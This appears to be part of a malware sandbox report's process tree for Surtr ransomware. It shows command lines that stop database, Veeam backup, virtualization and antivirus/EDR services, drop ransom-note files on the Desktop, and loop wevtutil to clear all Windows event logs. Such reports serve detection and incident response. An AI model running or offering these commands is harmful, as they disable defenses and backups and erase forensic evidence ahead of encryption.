C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵PID:1876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵PID:2852
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵PID:2964
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"4⤵PID:2396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"5⤵PID:1924
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵PID:224
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵PID:2852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵PID:1876
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵PID:2664
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵PID:2016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵PID:1520
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵PID:2812
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵PID:688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵PID:2740
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵PID:2456
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵PID:2348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵PID:2276
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:2352
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:2860
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵PID:548
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵PID:2844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵PID:1868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵PID:2040
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵PID:1832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵PID:3036
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵PID:1016
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵PID:564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵PID:3004
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵PID:2864
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵PID:2068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵PID:1564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵PID:2432
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵PID:1924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵PID:2900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵PID:2564
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵PID:2648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵PID:1712
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵PID:1136
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵PID:2704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵PID:228
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵PID:2148
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵PID:2800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵PID:2244
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵PID:212
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵PID:624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵PID:2144
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵PID:2468
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵PID:2308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵PID:332
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵PID:2788
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵PID:2592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵PID:1980
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵PID:1256
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵PID:2760
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵PID:2812
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵PID:2152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵PID:848
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵PID:1868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵PID:1528
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵PID:1328
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵PID:1756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵PID:608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵PID:2300
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵PID:3004
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵PID:2868
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵PID:204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵PID:1712
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵PID:2384
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵PID:2668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵PID:1596
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵PID:3060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵PID:1760
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵PID:2896
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵PID:308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵PID:796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵PID:1756
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵PID:1660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵PID:2484
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵PID:2452
-
C:\Windows\system32\net.exenet stop "W3Svc"4⤵PID:1036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵PID:2916
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵PID:2364
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵PID:564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵PID:2900
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵PID:2908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵PID:2432
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:200
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:220
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:1792
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵PID:3060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵PID:332
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵PID:1652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵PID:2856
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵PID:3044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵PID:1616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵PID:2248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵PID:1292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵PID:2352
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵PID:1996
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵PID:3032
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵PID:1824
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵PID:2788
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵PID:2212
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵PID:2484
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵PID:1660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵PID:2100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵PID:2792
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵PID:1836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵PID:1516
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵PID:996
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵PID:2584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵PID:2452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵PID:1100
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵PID:592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵PID:588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵PID:2964
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵PID:1292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵PID:2368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵PID:2348
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵PID:1624
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵PID:2352
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵PID:688
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵PID:448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵PID:2844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵PID:1348
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵PID:2176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵PID:2900
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵PID:800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵PID:2420
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵PID:3060
-
C:\Windows\system32\net.exenet stop "AVP"4⤵PID:212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵PID:940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵PID:2916
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵PID:2396
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵PID:1836
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵PID:2912
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵PID:2564
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵PID:2144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵PID:624
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵PID:3040
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵PID:1980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵PID:156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵PID:332
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵PID:1960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵PID:2756
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵PID:2856
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵PID:2348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵PID:904
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵PID:2608
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵PID:1924
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵PID:2468
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵PID:600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵PID:1308
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵PID:2668
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵PID:2656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵PID:2748
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵PID:308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵PID:1564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵PID:2360
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵PID:1156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵PID:2908
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵PID:1576
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵PID:1616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵
- System Time Discovery
PID:2040 -
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵
- System Time Discovery
PID:1356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵
- System Time Discovery
PID:968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵PID:1540
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵PID:2436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵PID:2584
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵PID:1576
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵PID:2344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵PID:2664
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵PID:2100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵PID:2588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵PID:2688
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"4⤵PID:204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"5⤵PID:228
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵PID:2516
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵PID:2040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵PID:560
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵PID:3980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵PID:3988
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵PID:4028
-
C:\Windows\system32\net.exenet stop "Sense"4⤵PID:4080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵PID:2592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵PID:1668
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵PID:332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵PID:2804
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵PID:2348
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵PID:2856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵PID:2724
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"3⤵PID:3932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"3⤵PID:3860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"3⤵PID:3900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"3⤵PID:3824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"3⤵PID:3796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵PID:3804
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"4⤵PID:3960
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"4⤵PID:3952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"4⤵PID:4024
-
-
